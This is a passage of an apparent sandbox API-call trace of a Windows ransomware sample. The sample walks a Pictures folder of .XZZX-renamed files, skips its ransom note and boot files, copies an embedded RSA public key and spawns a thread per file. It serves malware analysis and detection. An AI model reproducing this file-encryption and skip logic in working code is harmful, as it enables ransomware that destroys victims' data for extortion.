lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0247.141] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="ntldr") returned 0x0 [0247.141] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="NTLDR") returned 0x0 [0247.141] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0247.141] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="ntdetect.com") returned 0x0 [0247.141] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0247.141] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0247.141] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0247.141] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.141] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" | out: lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX") returned="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" [0247.141] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134c [0247.141] Sleep (dwMilliseconds=0x96) [0247.296] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0247.296] lstrcmpW (lpString1="4EC1B3383CF01EB849835EF241110300.XZZX", lpString2="..") returned 1 [0247.297] lstrcmpW (lpString1="4EC1B3383CF01EB849835EF241110300.XZZX", lpString2=".") returned 1 [0247.297] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0247.297] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="ntldr") returned 0x0 [0247.297] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="NTLDR") returned 0x0 [0247.297] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0247.297] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="ntdetect.com") returned 0x0 [0247.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0247.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0247.297] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0247.297] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.297] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4EC1B3383CF01EB849835EF241110300.XZZX" | out: lpString1="4EC1B3383CF01EB849835EF241110300.XZZX") returned="4EC1B3383CF01EB849835EF241110300.XZZX" [0247.297] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1350 [0247.297] Sleep (dwMilliseconds=0x96) [0247.452] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0247.452] lstrcmpW (lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX", lpString2="..") returned 1 [0247.452] lstrcmpW (lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX", lpString2=".") returned 1 [0247.452] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0247.453] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="ntldr") returned 0x0 [0247.453] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="NTLDR") returned 0x0 [0247.453] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0247.453] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0247.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0247.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0247.453] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0247.453] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.453] lstrcpyW (in: lpString1=0x17cf1c, lpString2="567FB4290F0A7CE338C9770B132B612B.XZZX" | out: lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX") returned="567FB4290F0A7CE338C9770B132B612B.XZZX" [0247.453] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.453] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1354 [0247.453] Sleep (dwMilliseconds=0x96) [0247.608] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0247.608] lstrcmpW (lpString1="5C36794D2643414F2FE671172A8D2597.XZZX", lpString2="..") returned 1 [0247.608] lstrcmpW (lpString1="5C36794D2643414F2FE671172A8D2597.XZZX", lpString2=".") returned 1 [0247.608] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0247.608] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="ntldr") returned 0x0 [0247.609] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="NTLDR") returned 0x0 [0247.609] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0247.609] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="ntdetect.com") returned 0x0 [0247.609] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0247.609] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0247.609] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0247.609] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.609] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5C36794D2643414F2FE671172A8D2597.XZZX" | out: lpString1="5C36794D2643414F2FE671172A8D2597.XZZX") returned="5C36794D2643414F2FE671172A8D2597.XZZX" [0247.609] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1358 [0247.609] WaitForSingleObject (hHandle=0x1358, dwMilliseconds=0xffffffff) returned 0x0 [0247.610] Sleep (dwMilliseconds=0x96) [0247.765] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0247.765] lstrcmpW (lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpString2="..") returned 1 [0247.765] lstrcmpW (lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpString2=".") returned 1 [0247.765] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0247.765] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="ntldr") returned 0x0 [0247.765] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="NTLDR") returned 0x0 [0247.765] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0247.765] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0247.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0247.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0247.765] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0247.765] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.765] lstrcpyW (in: lpString1=0x17cf1c, lpString2="609D61282FED0EE4AFD8291A340DF32C.XZZX" | out: lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX") returned="609D61282FED0EE4AFD8291A340DF32C.XZZX" [0247.765] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.765] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x135c [0247.765] Sleep (dwMilliseconds=0x96) [0247.920] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0247.920] lstrcmpW (lpString1="615936DC32228B708230065136576FB8.XZZX", lpString2="..") returned 1 [0247.920] lstrcmpW (lpString1="615936DC32228B708230065136576FB8.XZZX", lpString2=".") returned 1 [0247.921] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0247.921] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="ntldr") returned 0x0 [0247.921] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="NTLDR") returned 0x0 [0247.921] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0247.921] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0247.921] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0247.921] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0247.921] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0247.921] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.921] lstrcpyW (in: lpString1=0x17cf1c, lpString2="615936DC32228B708230065136576FB8.XZZX" | out: lpString1="615936DC32228B708230065136576FB8.XZZX") returned="615936DC32228B708230065136576FB8.XZZX" [0247.921] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1360 [0247.921] Sleep (dwMilliseconds=0x96) [0248.076] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0248.076] lstrcmpW (lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX", lpString2="..") returned 1 [0248.076] lstrcmpW (lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX", lpString2=".") returned 1 [0248.076] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0248.076] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="ntldr") returned 0x0 [0248.077] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="NTLDR") returned 0x0 [0248.077] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0248.077] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0248.077] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0248.077] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0248.077] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0248.077] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.077] lstrcpyW (in: lpString1=0x17cf1c, lpString2="6274BC861B7171923C3788AB1F9255DA.XZZX" | out: lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX") returned="6274BC861B7171923C3788AB1F9255DA.XZZX" [0248.077] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.077] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1364 [0248.077] Sleep (dwMilliseconds=0x96) [0248.232] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0248.232] lstrcmpW (lpString1="693610CE0E824D54F2368B0112B7319C.XZZX", lpString2="..") returned 1 [0248.232] lstrcmpW (lpString1="693610CE0E824D54F2368B0112B7319C.XZZX", lpString2=".") returned 1 [0248.232] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0248.232] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="ntldr") returned 0x0 [0248.233] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="NTLDR") returned 0x0 [0248.233] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0248.233] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0248.233] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0248.233] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0248.233] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0248.233] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.233] lstrcpyW (in: lpString1=0x17cf1c, lpString2="693610CE0E824D54F2368B0112B7319C.XZZX" | out: lpString1="693610CE0E824D54F2368B0112B7319C.XZZX") returned="693610CE0E824D54F2368B0112B7319C.XZZX" [0248.233] lstrcpyW 